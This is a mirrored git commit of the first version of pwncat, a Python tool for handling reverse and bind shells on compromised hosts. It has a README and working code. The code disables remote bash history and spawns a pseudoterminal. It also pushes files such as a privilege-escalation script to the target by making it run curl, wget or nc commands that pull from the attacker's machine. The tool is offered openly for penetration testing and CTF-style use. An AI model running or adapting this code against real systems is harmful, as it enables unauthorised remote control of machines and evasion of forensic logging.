mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-11-27 10:54:14 +01:00
Added readme
This commit is contained in:
commit
b30c894600
4
.gitignore
vendored
Normal file
4
.gitignore
vendored
Normal file
@ -0,0 +1,4 @@
|
||||
env/
|
||||
**/*.pyc
|
||||
**/__pycache__/
|
||||
**/*.egg-info/
|
77
README.md
Normal file
77
README.md
Normal file
@ -0,0 +1,77 @@
|
||||
# pwncat - fancy reverse and bind shell handler
|
||||
|
||||
This is a little tool to make interacting with raw reverse and bind shells a
|
||||
little nicer. `pwncat` can either connect to a remote bind shell or listen for
|
||||
an incoming reverse shell. After receiving a connection, it will setup some
|
||||
common configurations when working with remote shells. For example:
|
||||
|
||||
- Unset the `HIST_FILE` macro to disable bash history
|
||||
- Normalize shell prompt
|
||||
- Locate useful binaries (using `which`)
|
||||
- Attempt to spawn a pseudoterminal (pty) for a full interactive session
|
||||
|
||||
`pwncat` knows how to spawn pty's with a few different methods and will
|
||||
cross-reference the methods with the executables previously enumerated. After
|
||||
spawning a pty, it will setup the controlling terminal in raw mode, so you can
|
||||
interact in a similar fashion to `ssh`.
|
||||
|
||||
`pwncat` will also synchronize the remote pty settings (such as rows, columns,
|
||||
`TERM` environment variable) with your local settings to ensure the shell
|
||||
behaves correctly.
|
||||
|
||||
## Command and Control Features
|
||||
|
||||
`pwncat` has a few useful features baked in for interacting with a remote shell.
|
||||
You can access a local command interpreter at any time by getting to a blank
|
||||
line and pressing the sequence `~C` (that's `Shift+\`` then `Shift+c`). This new
|
||||
prompt provides some basic interaction between your local host and the remote
|
||||
host.
|
||||
|
||||
When at this prompt, you can return to your shell at any time with `C-d` or the
|
||||
"back" command. To get a list of available commands, you can use `help`. At the
|
||||
time of writing the following commands are supported:
|
||||
|
||||
- `sync`: synchronize rows/columns and TERM environment.
|
||||
- `set`: set local variables (such as `lhost`).
|
||||
- `upload`: upload files to the remote host
|
||||
|
||||
|
||||
## Uploading Files
|
||||
|
||||
The `upload` command in the local shell allows you to upload files quickly and
|
||||
easily. `pwncat` can use a variety of methods to transfer the files, and will
|
||||
use the best one given the executables it was able to find. If none of the
|
||||
required executables were found, `pwncat` will transfer the file in chunks of
|
||||
base64, and decode them on the other end. This is slower, but will work in a
|
||||
pinch.
|
||||
|
||||
The usage is simple, but you must set the `lhost` variable first with te `set`
|
||||
command so that `pwncat` knows how to instruct the remote host to connect to us.
|
||||
|
||||
```
|
||||
localhost$ set lhost "8.8.8.8"
|
||||
```
|
||||
|
||||
Once that is set up, you can upload files but specifying a local file name:
|
||||
|
||||
```
|
||||
localhost$ upload /opt/tools/linpeas.sh
|
||||
```
|
||||
|
||||
By default, the file will be written to the current working directory of your
|
||||
remote shell. You can use the `--output/-o` option to direct the output to a
|
||||
directory/file of your choosing. You can also select a specific method, if you
|
||||
would like, however that shouldn't be necessary. The default method is to
|
||||
automatically select the best available. `pwncat` even gives you a nice progress
|
||||
bar while it uploads!
|
||||
|
||||
## More to come!
|
||||
|
||||
I wrote this in the last few days, and there's bound to be bugs or edge-cases.
|
||||
Further, I want to build out the local prompt commands more. Obviously, a
|
||||
download option would be ideal, but since the interaction with the remote
|
||||
terminal is scriptable, the sky is the limit.
|
||||
|
||||
Another feature that I plan to implement soon is tab completions for the local
|
||||
prompt (remote tab completions work already thanks to the pty ;). I'll be
|
||||
working on that ASAP.
|
0
pwncat/__init__.py
Normal file
0
pwncat/__init__.py
Normal file
109
pwncat/__main__.py
Normal file
109
pwncat/__main__.py
Normal file
@ -0,0 +1,109 @@
|
||||
#!/usr/bin/env python3
|
||||
import selectors
|
||||
import argparse
|
||||
import logging
|
||||
import socket
|
||||
import sys
|
||||
|
||||
from pwncat.pty import PtyHandler
|
||||
from pwncat import util
|
||||
|
||||
|
||||
def main():
|
||||
|
||||
# Default log-level is "INFO"
|
||||
logging.getLogger().setLevel(logging.INFO)
|
||||
|
||||
parser = argparse.ArgumentParser(prog="pwncat")
|
||||
mutex_group = parser.add_mutually_exclusive_group(required=True)
|
||||
mutex_group.add_argument(
|
||||
"--reverse",
|
||||
"-r",
|
||||
action="store_true",
|
||||
help="Listen on the specified port for connections from a remote host",
|
||||
)
|
||||
mutex_group.add_argument(
|
||||
"--bind", "-b", action="store_true", help="Connect to a remote host"
|
||||
)
|
||||
parser.add_argument(
|
||||
"--host",
|
||||
"-H",
|
||||
type=str,
|
||||
help=(
|
||||
"Bind address for reverse connections. Remote host for bind connections (default: 0.0.0.0)"
|
||||
),
|
||||
default="0.0.0.0",
|
||||
)
|
||||
parser.add_argument(
|
||||
"--port",
|
||||
"-p",
|
||||
type=int,
|
||||
help="Bind port for reverse connections. Remote port for bind connections",
|
||||
required=True,
|
||||
)
|
||||
parser.add_argument(
|
||||
"--method",
|
||||
"-m",
|
||||
choices=["none", *PtyHandler.OPEN_METHODS.keys()],
|
||||
help="Method to create a pty on the remote host (default: script)",
|
||||
default="script",
|
||||
)
|
||||
args = parser.parse_args()
|
||||
|
||||
if args.reverse:
|
||||
# Listen on a socket for connections
|
||||
util.info(f"binding to {args.host}:{args.port}", overlay=True)
|
||||
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
server.bind((args.host, args.port))
|
||||
# After the first connection, drop further attempts
|
||||
server.listen(1)
|
||||
|
||||
# Wait for a single connection
|
||||
try:
|
||||
(client, address) = server.accept()
|
||||
except KeyboardInterrupt:
|
||||
util.warn(f"aborting listener...")
|
||||
sys.exit(0)
|
||||
else:
|
||||
util.info(f"connecting to {args.host}:{args.port}", overlay=True)
|
||||
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
client.connect((args.host, args.port))
|
||||
address = (args.host, args.port)
|
||||
|
||||
util.info(f"connection to {address[0]}:{address[1]} established", overlay=True)
|
||||
|
||||
# Create a PTY handler to proctor communications with the remote PTY
|
||||
handler = PtyHandler(client)
|
||||
|
||||
# Setup the selector to wait for data asynchronously from both streams
|
||||
selector = selectors.DefaultSelector()
|
||||
selector.register(sys.stdin, selectors.EVENT_READ, None)
|
||||
selector.register(client, selectors.EVENT_READ, "read")
|
||||
|
||||
# Initialize our state
|
||||
done = False
|
||||
|
||||
try:
|
||||
while not done:
|
||||
for k, _ in selector.select():
|
||||
if k.fileobj is sys.stdin:
|
||||
data = sys.stdin.buffer.read(8)
|
||||
handler.process_input(data)
|
||||
else:
|
||||
data = handler.recv()
|
||||
if data is None or len(data) == 0:
|
||||
done = True
|
||||
break
|
||||
sys.stdout.buffer.write(data)
|
||||
sys.stdout.flush()
|
||||
except ConnectionResetError:
|
||||
handler.restore()
|
||||
util.warn("connection reset by remote host")
|
||||
else:
|
||||
# Restore the shell
|
||||
handler.restore()
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
sys.exit(0)
|
400
pwncat/pty.py
Normal file
400
pwncat/pty.py
Normal file
@ -0,0 +1,400 @@
|
||||
#!/usr/bin/env python3
|
||||
from prompt_toolkit import prompt
|
||||
from prompt_toolkit.shortcuts import ProgressBar
|
||||
import logging
|
||||
import argparse
|
||||
import base64
|
||||
import time
|
||||
import socket
|
||||
import enum
|
||||
import shlex
|
||||
import sys
|
||||
import os
|
||||
|
||||
from pwncat import util
|
||||
|
||||
|
||||
class State(enum.Enum):
|
||||
""" The current PtyHandler state """
|
||||
|
||||
NORMAL = enum.auto()
|
||||
RAW = enum.auto()
|
||||
COMMAND = enum.auto()
|
||||
|
||||
|
||||
class PtyHandler:
|
||||
""" Handles creating the pty on the remote end and locally processing input
|
||||
on the local end """
|
||||
|
||||
OPEN_METHODS = {
|
||||
"script": "exec {} -qc /bin/sh /dev/null",
|
||||
"python": "exec {} -c \"import pty; pty.spawn('/bin/sh')\"",
|
||||
}
|
||||
|
||||
INTERESTING_BINARIES = [
|
||||
("python", "python", 9999),
|
||||
("python2", "python", 9998),
|
||||
("python3", "python", 10000),
|
||||
("perl", "perl", 0),
|
||||
("bash", "sh", 10000),
|
||||
("dash", "sh", 9999),
|
||||
("zsh", "sh", 9999),
|
||||
("sh", "sh", 0),
|
||||
("curl", "curl", 0),
|
||||
("wget", "wget", 0),
|
||||
("nc", "nc", 0),
|
||||
("netcat", "nc", 0),
|
||||
("ncat", "nc", 0),
|
||||
("script", "script", 0),
|
||||
]
|
||||
|
||||
def __init__(self, client: socket.SocketType):
|
||||
""" Initialize a new Pty Handler. This will handle creating the PTY and
|
||||
setting the local terminal to raw. It also maintains the state to open a
|
||||
local terminal if requested and exit raw mode. """
|
||||
|
||||
self.client = client
|
||||
self.state = "normal"
|
||||
self.saved_term_state = None
|
||||
self.input = b""
|
||||
self.lhost = None
|
||||
self.known_binaries = {}
|
||||
self.vars = {"lhost": None}
|
||||
|
||||
# Ensure history is disabled
|
||||
util.info("disabling remote command history", overlay=True)
|
||||
client.sendall(b"unset HIST_FILE\n")
|
||||
|
||||
util.info("setting terminal prompt", overlay=True)
|
||||
client.sendall(b'export PS1="(remote) \\u@\\h\\$ "\n\n')
|
||||
|
||||
# Locate interesting binaries
|
||||
for name, friendly, priority in PtyHandler.INTERESTING_BINARIES:
|
||||
util.info(f"resolving remote binary: {name}", overlay=True)
|
||||
|
||||
# We already found a preferred option
|
||||
if (
|
||||
friendly in self.known_binaries
|
||||
and self.known_binaries[friendly][1] > priority
|
||||
):
|
||||
continue
|
||||
|
||||
# Look for the given binary
|
||||
response = self.run(f"which {shlex.quote(name)}", has_pty=False)
|
||||
if response == b"":
|
||||
continue
|
||||
|
||||
self.known_binaries[friendly] = (response.decode("utf-8"), priority)
|
||||
|
||||
for m, cmd in PtyHandler.OPEN_METHODS.items():
|
||||
if m in self.known_binaries:
|
||||
method_cmd = cmd.format(self.known_binaries[m][0])
|
||||
method = m
|
||||
break
|
||||
else:
|
||||
util.error("no available methods to spawn a pty!")
|
||||
raise RuntimeError("no available methods to spawn a pty!")
|
||||
|
||||
# Open the PTY
|
||||
util.info(f"opening pseudoterminal via {method}", overlay=True)
|
||||
client.sendall(method_cmd.encode("utf-8") + b"\n")
|
||||
|
||||
# Synchronize the terminals
|
||||
util.info("synchronizing terminal state", overlay=True)
|
||||
self.do_sync([])
|
||||
|
||||
# Force the local TTY to enter raw mode
|
||||
self.enter_raw()
|
||||
|
||||
def process_input(self, data: bytes):
|
||||
r""" Process a new byte of input from stdin. This is to catch "\r~C" and open
|
||||
a local prompt """
|
||||
|
||||
# Send the new data to the client
|
||||
self.client.send(data)
|
||||
|
||||
# Only process data following a new line
|
||||
if data == b"\r":
|
||||
self.input = data
|
||||
elif len(data) == 0:
|
||||
return
|
||||
else:
|
||||
self.input += data
|
||||
|
||||
if self.input == b"\r~C":
|
||||
# Erase the current line on the remote host ("~C")
|
||||
# This is 2 backspace characters
|
||||
self.client.send(b"\x08" * 2 + b"\r")
|
||||
# Start processing local commands
|
||||
self.enter_command()
|
||||
elif len(self.input) >= 3:
|
||||
# Our only escapes are 3 characters (include the newline)
|
||||
self.input = b""
|
||||
|
||||
def recv(self) -> bytes:
|
||||
""" Recieve data from the client """
|
||||
return self.client.recv(4096)
|
||||
|
||||
def enter_raw(self, save: bool = True):
|
||||
""" Enter raw mode on the local terminal """
|
||||
old_term_state = util.enter_raw_mode()
|
||||
|
||||
self.state = State.RAW
|
||||
|
||||
# Save the state if requested
|
||||
if save:
|
||||
self.saved_term_state = old_term_state
|
||||
|
||||
def enter_command(self):
|
||||
""" Enter commmand mode. This sets normal mode and uses prompt toolkit
|
||||
process commands from the user for the local machine """
|
||||
|
||||
# Go back to normal mode
|
||||
self.restore()
|
||||
self.state = State.COMMAND
|
||||
|
||||
# Hopefully this fixes weird cursor position issues
|
||||
sys.stdout.write("\n")
|
||||
|
||||
# Process commands
|
||||
while self.state is State.COMMAND:
|
||||
try:
|
||||
line = prompt("localhost$ ")
|
||||
except EOFError:
|
||||
# The user pressed ctrl-d, go back
|
||||
self.enter_raw()
|
||||
continue
|
||||
|
||||
argv = shlex.split(line)
|
||||
|
||||
# Empty command
|
||||
if len(argv) == 0:
|
||||
continue
|
||||
|
||||
try:
|
||||
method = getattr(self, f"do_{argv[0]}")
|
||||
except AttributeError:
|
||||
util.warn(f"{argv[0]}: command does not exist")
|
||||
continue
|
||||
|
||||
# Call the method
|
||||
method(argv[1:])
|
||||
|
||||
def do_back(self, _):
|
||||
""" Exit command mode """
|
||||
self.enter_raw(save=False)
|
||||
|
||||
def do_upload(self, argv):
|
||||
""" Upload a file to the remote host """
|
||||
|
||||
downloaders = {
|
||||
"curl": ("http", "curl --output {outfile} http://{lhost}:{lport}/{lfile}"),
|
||||
"wget": ("http", "wget -O {outfile} http://{lhost}:{lport}/{lfile}"),
|
||||
"nc": ("raw", "nc {lhost} {lport} > {outfile}"),
|
||||
}
|
||||
servers = {"http": util.serve_http_file, "raw": util.serve_raw_file}
|
||||
|
||||
parser = argparse.ArgumentParser(prog="upload")
|
||||
parser.add_argument(
|
||||
"--method",
|
||||
"-m",
|
||||
choices=downloaders.keys(),
|
||||
default=None,
|
||||
help="set the download method (default: auto)",
|
||||
)
|
||||
parser.add_argument(
|
||||
"--output",
|
||||
"-o",
|
||||
default="./{basename}",
|
||||
help="path to the output file (default: basename of input)",
|
||||
)
|
||||
parser.add_argument("path", help="path to the file to upload")
|
||||
|
||||
try:
|
||||
args = parser.parse_args(argv)
|
||||
except SystemExit:
|
||||
# The arguments were parsed incorrectly, return.
|
||||
return
|
||||
|
||||
if self.vars.get("lhost", None) is None:
|
||||
util.error("[!] you must provide an lhost address for reverse connections!")
|
||||
return
|
||||
|
||||
if not os.path.isfile(args.path):
|
||||
util.error(f"[!] {args.path}: no such file or directory")
|
||||
return
|
||||
|
||||
if args.method is not None and args.method not in self.known_binaries:
|
||||
util.error(f"{args.method}: method unavailable")
|
||||
elif args.method is not None:
|
||||
method = downloaders[args.method]
|
||||
else:
|
||||
method = None
|
||||
for m, info in downloaders.items():
|
||||
if m in self.known_binaries:
|
||||
util.info("uploading via {m}")
|
||||
method = info
|
||||
break
|
||||
else:
|
||||
util.warn(
|
||||
"no available upload methods. falling back to echo/base64 method"
|
||||
)
|
||||
|
||||
path = args.path
|
||||
basename = os.path.basename(args.path)
|
||||
name = basename
|
||||
outfile = args.output.format(basename=basename)
|
||||
|
||||
with ProgressBar("uploading") as pb:
|
||||
|
||||
counter = pb(range(os.path.getsize(path)))
|
||||
last_update = time.time()
|
||||
|
||||
def on_progress(copied, blocksz):
|
||||
""" Update the progress bar """
|
||||
counter.items_completed += blocksz
|
||||
if counter.items_completed >= counter.total:
|
||||
counter.done = True
|
||||
counter.stopped = True
|
||||
if (time.time() - last_update) > 0.1:
|
||||
pb.invalidate()
|
||||
|
||||
if method is not None:
|
||||
server = servers[method[0]](path, name, progress=on_progress)
|
||||
|
||||
command = method[1].format(
|
||||
outfile=shlex.quote(outfile), lhost=self.vars["lhost"], lfile=name,
|
||||
)
|
||||
|
||||
result = self.run(command, wait=False)
|
||||
else:
|
||||
server = None
|
||||
with open(path, "rb") as fp:
|
||||
self.run(f"echo -n > {outfile}")
|
||||
copied = 0
|
||||
for chunk in iter(lambda: fp.read(8192), b""):
|
||||
encoded = base64.b64encode(chunk).decode("utf-8")
|
||||
self.run(f"echo -n {encoded} | base64 -d >> {outfile}")
|
||||
copied += len(chunk)
|
||||
on_progress(copied, len(chunk))
|
||||
|
||||
try:
|
||||
while not counter.done:
|
||||
time.sleep(0.1)
|
||||
except KeyboardInterrupt:
|
||||
pass
|
||||
finally:
|
||||
if server is not None:
|
||||
server.shutdown()
|
||||
|
||||
# https://github.com/prompt-toolkit/python-prompt-toolkit/issues/964
|
||||
time.sleep(0.1)
|
||||
|
||||
def do_sync(self, argv):
|
||||
""" Synchronize the remote PTY with the local terminal settings """
|
||||
|
||||
TERM = os.environ.get("TERM", "xterm")
|
||||
columns, rows = os.get_terminal_size(0)
|
||||
|
||||
self.run(f"stty rows {rows}")
|
||||
self.run(f"stty columns {columns}")
|
||||
self.run(f'export TERM="{TERM}"')
|
||||
|
||||
def do_set(self, argv):
|
||||
""" Set or view the currently assigned variables """
|
||||
|
||||
if len(argv) == 0:
|
||||
for k, v in self.vars.items():
|
||||
print(f" {k} = {shlex.quote(v)}")
|
||||
return
|
||||
|
||||
parser = argparse.ArgumentParser(prog="set")
|
||||
parser.add_argument("variable", help="the variable name")
|
||||
parser.add_argument("value", help="the new variable type")
|
||||
args = parser.parse_args(argv)
|
||||
|
||||
self.vars[args.variable] = args.value
|
||||
|
||||
def do_help(self, argv):
|
||||
""" View help for local commands """
|
||||
|
||||
if len(argv) == 0:
|
||||
commands = [x for x in dir(self) if x.startswith("do_")]
|
||||
else:
|
||||
commands = [x for x in dir(self) if x.startswith("do_") and x[3:] in argv]
|
||||
|
||||
for c in commands:
|
||||
help_msg = getattr(self, c).__doc__
|
||||
print(f"{c[3:]:15s}{help_msg}")
|
||||
|
||||
def run(self, cmd, has_pty=True, wait=True) -> bytes:
|
||||
""" Run a command in the context of the remote host and return the
|
||||
output. This is run synchrounously.
|
||||
|
||||
:param cmd: The command to run. Either a string or an argv list.
|
||||
:param has_pty: Whether a pty was spawned
|
||||
"""
|
||||
|
||||
if isinstance(cmd, list):
|
||||
cmd = shlex.join(cmd)
|
||||
|
||||
EOL = b"\r" if has_pty else b"\n"
|
||||
|
||||
# Read until there's no more data in the queue
|
||||
# This works by waiting for our known prompt
|
||||
self.recvuntil(b"(remote) ")
|
||||
try:
|
||||
self.recvuntil(b"$ ", socket.MSG_DONTWAIT)
|
||||
self.recvuntil(b"# ", socket.MSG_DONTWAIT)
|
||||
except BlockingIOError:
|
||||
pass
|
||||
|
||||
# Surround the output with known delimeters
|
||||
# self.client.send(b"echo _OUTPUT_DELIM_START_\r")
|
||||
self.client.send(cmd.encode("utf-8") + EOL)
|
||||
# self.client.send(b"echo -e '" + DELIM_ESCAPED + b"'\r")
|
||||
|
||||
# Initialize response buffer
|
||||
response = b""
|
||||
peek_len = 4096
|
||||
|
||||
# Look for the next prompt in the output and leave it in the buffer
|
||||
if wait:
|
||||
while True:
|
||||
data = self.client.recv(peek_len, socket.MSG_PEEK)
|
||||
if b"(remote) " in data:
|
||||
response = data.split(b"(remote) ")[0]
|
||||
self.client.recv(len(response))
|
||||
break
|
||||
if len(data) == peek_len:
|
||||
peek_len += 4096
|
||||
|
||||
# The echoed input command is currently in the output
|
||||
if has_pty:
|
||||
response = b"".join(response.split(b"\r\n")[1:])
|
||||
else:
|
||||
response = b"".join(response.split(b"\n")[1:])
|
||||
|
||||
# Bash sends these escape sequences for some reason, and it fucks up
|
||||
# the output
|
||||
while b"\x1b_" in response:
|
||||
response = response.split(b"\x1b_")
|
||||
before = response[0]
|
||||
after = b"\x1b_".join(response[1:])
|
||||
response = before + b"\x1b\\".join(after.split(b"\x1b\\")[1])
|
||||
|
||||
return response
|
||||
|
||||
def recvuntil(self, needle: bytes, flags=0):
|
||||
""" Recieve data from the client until the specified string appears """
|
||||
|
||||
result = b""
|
||||
while not result.endswith(needle):
|
||||
result += self.client.recv(1, flags)
|
||||
|
||||
return result
|
||||
|
||||
def restore(self):
|
||||
""" Restore the terminal state """
|
||||
util.restore_terminal(self.saved_term_state)
|
||||
self.state = State.NORMAL
|
214
pwncat/util.py
Normal file
214
pwncat/util.py
Normal file
@ -0,0 +1,214 @@
|
||||
#!/usr/bin/env python3
|
||||
from typing import Tuple, BinaryIO, Callable
|
||||
from http.server import BaseHTTPRequestHandler, HTTPServer
|
||||
from socketserver import TCPServer, BaseRequestHandler
|
||||
from functools import partial
|
||||
from colorama import Fore
|
||||
import threading
|
||||
import logging
|
||||
import termios
|
||||
import fcntl
|
||||
import tty
|
||||
import sys
|
||||
import os
|
||||
|
||||
|
||||
class SingleFileServer(BaseHTTPRequestHandler):
|
||||
def __init__(
|
||||
self,
|
||||
request,
|
||||
addr,
|
||||
server,
|
||||
name: str,
|
||||
path: str,
|
||||
content_type="application/octet-stream",
|
||||
progress=None,
|
||||
):
|
||||
self.file_name = name
|
||||
self.file_path = path
|
||||
self.content_type = content_type
|
||||
self.progress = progress
|
||||
|
||||
super(SingleFileServer, self).__init__(request, addr, server)
|
||||
|
||||
def do_GET(self):
|
||||
""" Handle GET requests """
|
||||
|
||||
# We only serve this one file
|
||||
if self.path != f"/{self.file_name}":
|
||||
self.send_error(404)
|
||||
return
|
||||
|
||||
length = os.path.getsize(self.file_path)
|
||||
|
||||
# Send response headers
|
||||
self.send_response(200)
|
||||
self.send_header("Content-Type", self.content_type)
|
||||
self.send_header("Content-Length", str(length))
|
||||
self.end_headers()
|
||||
|
||||
# Send data
|
||||
with open(self.file_path, "rb") as fp:
|
||||
copyfileobj(fp, self.wfile, self.progress)
|
||||
|
||||
def log_message(self, fmt, *args):
|
||||
""" BE QUIET """
|
||||
return
|
||||
|
||||
|
||||
def copyfileobj(src, dst, callback):
|
||||
""" Copy a file object to another file object with a callback.
|
||||
This method assumes that both files are binary and support readinto
|
||||
"""
|
||||
|
||||
try:
|
||||
length = os.stat(src.fileno()).st_size
|
||||
length = min(length, 1024 * 1024)
|
||||
except OSError:
|
||||
length = 1024 * 1024
|
||||
|
||||
copied = 0
|
||||
with memoryview(bytearray(length)) as mv:
|
||||
while True:
|
||||
n = src.readinto(mv)
|
||||
if not n:
|
||||
break
|
||||
if n < length:
|
||||
with mv[:n] as smv:
|
||||
dst.write(smv)
|
||||
else:
|
||||
dst.write(mv)
|
||||
copied += n
|
||||
callback(copied, n)
|
||||
|
||||
|
||||
def enter_raw_mode():
|
||||
""" Set stdin/stdout to raw mode to pass data directly.
|
||||
|
||||
returns: the old state of the terminal
|
||||
"""
|
||||
|
||||
info("setting terminal to raw mode and disabling echo")
|
||||
|
||||
# Ensure we don't have any weird buffering issues
|
||||
sys.stdout.flush()
|
||||
|
||||
# Grab and duplicate current attributes
|
||||
fild = sys.stdin.fileno()
|
||||
old = termios.tcgetattr(fild)
|
||||
new = termios.tcgetattr(fild)
|
||||
|
||||
# Remove ECHO from lflag and ensure we won't block
|
||||
new[3] &= ~(termios.ECHO | termios.ICANON)
|
||||
new[6][termios.VMIN] = 0
|
||||
new[6][termios.VTIME] = 0
|
||||
termios.tcsetattr(fild, termios.TCSADRAIN, new)
|
||||
|
||||
# Set raw mode
|
||||
tty.setraw(sys.stdin)
|
||||
|
||||
orig_fl = fcntl.fcntl(sys.stdin, fcntl.F_GETFL)
|
||||
fcntl.fcntl(sys.stdin, fcntl.F_SETFL, orig_fl | os.O_NONBLOCK)
|
||||
|
||||
return old, orig_fl
|
||||
|
||||
|
||||
def restore_terminal(state):
|
||||
""" restore the stdio state from the result of "enter_raw_mode" """
|
||||
termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, state[0])
|
||||
tty.setcbreak(sys.stdin)
|
||||
fcntl.fcntl(sys.stdin, fcntl.F_SETFL, state[1])
|
||||
sys.stdout.write("\n")
|
||||
info("local terminal restored")
|
||||
|
||||
|
||||
def serve_http_file(
|
||||
path: str, name: str, port: int = 0, progress: Callable = None
|
||||
) -> HTTPServer:
|
||||
""" Serve a single file on the given port over HTTP. """
|
||||
|
||||
# Create an HTTP server
|
||||
server = HTTPServer(
|
||||
("0.0.0.0", port),
|
||||
partial(SingleFileServer, name=name, path=path, progress=progress),
|
||||
)
|
||||
|
||||
# Start serving the file
|
||||
thread = threading.Thread(target=lambda: server.serve_forever(), daemon=True)
|
||||
thread.start()
|
||||
|
||||
return server
|
||||
|
||||
|
||||
def serve_raw_file(
|
||||
path: str, name: str, port: int = 0, progress: Callable = None
|
||||
) -> TCPServer:
|
||||
""" Serve a file on the given port """
|
||||
|
||||
class SocketWrapper:
|
||||
def __init__(self, sock):
|
||||
self.s = sock
|
||||
|
||||
def write(self, n: int):
|
||||
return self.s.send(n)
|
||||
|
||||
class SendFile(BaseRequestHandler):
|
||||
def handle(self):
|
||||
with open(path, "rb") as fp:
|
||||
copyfileobj(fp, SocketWrapper(self.request), progress)
|
||||
|
||||
server = TCPServer(("0.0.0.0", port), SendFile)
|
||||
thread = threading.Thread(target=lambda: server.serve_forever(), daemon=True)
|
||||
thread.start()
|
||||
|
||||
return server
|
||||
|
||||
|
||||
LAST_LOG_MESSAGE = ("", False)
|
||||
PROG_ANIMATION = ["/-\\"]
|
||||
LAST_PROG_ANIM = -1
|
||||
|
||||
|
||||
def log(level, message, overlay=False):
|
||||
global LAST_LOG_MESSAGE
|
||||
global LAST_PROG_ANIM
|
||||
|
||||
prefix = {
|
||||
"info": f"[{Fore.BLUE}+{Fore.RESET}] ",
|
||||
"warn": f"[{Fore.YELLOW}?{Fore.RESET}] ",
|
||||
"error": f"[{Fore.RED}!{Fore.RESET}] ",
|
||||
"prog": f"[{Fore.CYAN}+{Fore.RESET}] ",
|
||||
}
|
||||
|
||||
if overlay:
|
||||
sys.stdout.write(f"\r{len(LAST_LOG_MESSAGE[0])*' '}\r")
|
||||
elif LAST_LOG_MESSAGE[1]:
|
||||
sys.stdout.write("\n")
|
||||
|
||||
if level == "prog":
|
||||
LAST_PROG_ANIM = (LAST_PROG_ANIM + 1) % len(PROG_ANIMATION)
|
||||
prefix["prog"] = prefix["prog"].replace("+", PROG_ANIMATION[LAST_PROG_ANIM])
|
||||
|
||||
LAST_LOG_MESSAGE = (f"{prefix[level]} {message}", overlay)
|
||||
sys.stdout.write(LAST_LOG_MESSAGE[0])
|
||||
|
||||
if not overlay:
|
||||
sys.stdout.write("\n")
|
||||
else:
|
||||
sys.stdout.flush()
|
||||
|
||||
|
||||
def info(message, overlay=False):
|
||||
log("info", message, overlay)
|
||||
|
||||
|
||||
def warn(message, overlay=False):
|
||||
log("warn", message, overlay)
|
||||
|
||||
|
||||
def error(message, overlay=False):
|
||||
log("error", message, overlay)
|
||||
|
||||
|
||||
def progress(message, overlay=False):
|
||||
log("prog", message, overlay)
|
3
requirements.txt
Normal file
3
requirements.txt
Normal file
@ -0,0 +1,3 @@
|
||||
colorama==0.4.3
|
||||
prompt-toolkit==3.0.5
|
||||
wcwidth==0.1.9
|
30
setup.py
Normal file
30
setup.py
Normal file
@ -0,0 +1,30 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
from setuptools import find_packages
|
||||
from setuptools import setup
|
||||
from setuptools.command.install import install
|
||||
import shutil, os, stat
|
||||
import binascii
|
||||
|
||||
dependencies = [
|
||||
"prompt-toolkit",
|
||||
"wcwidth",
|
||||
"colorama"
|
||||
]
|
||||
|
||||
dependency_links = []
|
||||
|
||||
# Setup
|
||||
setup(
|
||||
name="pwncat",
|
||||
version="0.1",
|
||||
description="A fancy reverse and bind shell handler",
|
||||
author="Caleb Stewart",
|
||||
url="https://gitlab.com/calebstewart/pwncat",
|
||||
packages=find_packages(),
|
||||
package_data={},
|
||||
entry_points={"console_scripts": ["pwncat=pwncat.__main__:main"]},
|
||||
data_files=[],
|
||||
install_requires=dependencies,
|
||||
dependency_links=dependency_links,
|
||||
)
|
Loading…
Reference in New Issue
Block a user